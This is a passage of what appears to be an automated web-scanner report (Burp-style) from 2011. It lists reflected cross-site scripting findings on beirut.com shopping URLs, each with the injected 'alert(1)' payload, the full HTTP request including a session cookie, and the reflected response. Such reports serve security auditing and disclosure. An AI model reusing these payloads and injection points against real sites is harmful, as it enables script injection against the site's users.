Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:09:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingbe4ec"><a>153e7342d83">
...[SNIP]...

4.912. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 100e9'-alert(1)-'bd4c5fbe64f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping100e9'-alert(1)-'bd4c5fbe64f/Consumer-Goods/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:19:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping100e9'-alert(1)-'bd4c5fbe64f/Consumer-Goods/235690923/Roastary/78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.913. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c282e<script>alert(1)</script>e64e32c93a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsc282e<script>alert(1)</script>e64e32c93a3/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsc282e<script>alert(1)</script>e64e32c93a3 <a href="#" id="backlink">
...[SNIP]...

4.914. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da910'-alert(1)-'dee1ecb246d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goodsda910'-alert(1)-'dee1ecb246d/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goodsda910'-alert(1)-'dee1ecb246d/235690923/Roastary/78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.915. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5d05'-alert(1)-'50f46949a4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923e5d05'-alert(1)-'50f46949a4f/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:31:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923e5d05'-alert(1)-'50f46949a4f/Roastary/78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.916. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f41b'-alert(1)-'fbbd96b6bee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Roastary6f41b'-alert(1)-'fbbd96b6bee/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:36:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Roastary6f41b'-alert(1)-'fbbd96b6bee/78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.917. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edc62'-alert(1)-'3a812d24093 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Roastary/78edc62'-alert(1)-'3a812d24093 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:39:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Roastary/78edc62'-alert(1)-'3a812d24093';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.918. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 747fd'-alert(1)-'b7fca72191e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping747fd'-alert(1)-'b7fca72191e/Consumer-Goods/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:26:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping747fd'-alert(1)-'b7fca72191e/Consumer-Goods/235690923/Sporting-Goods-Attire/45';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.919. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602bc"><a>2563faf5cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping602bc"><a>2563faf5cdb/Consumer-Goods/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:21:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping602bc"><a>2563faf5cdb">
...[SNIP]...

4.920. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3cde2<script>alert(1)</script>50f08ad7cec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods3cde2<script>alert(1)</script>50f08ad7cec/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:30:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods3cde2<script>alert(1)</script>50f08ad7cec <a href="#" id="backlink">
...[SNIP]...

4.921. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ce9f'-alert(1)-'3f6bcc13f32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods6ce9f'-alert(1)-'3f6bcc13f32/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:30:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods6ce9f'-alert(1)-'3f6bcc13f32/235690923/Sporting-Goods-Attire/45';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.922. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0512'-alert(1)-'bbec3fe9042 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923a0512'-alert(1)-'bbec3fe9042/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:34:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923a0512'-alert(1)-'bbec3fe9042/Sporting-Goods-Attire/45';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.923. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bdc7'-alert(1)-'778dbb87267 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire8bdc7'-alert(1)-'778dbb87267/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:41:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire8bdc7'-alert(1)-'778dbb87267/45';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.924. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19a4a'-alert(1)-'923d354c1e8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/4519a4a'-alert(1)-'923d354c1e8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:43:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
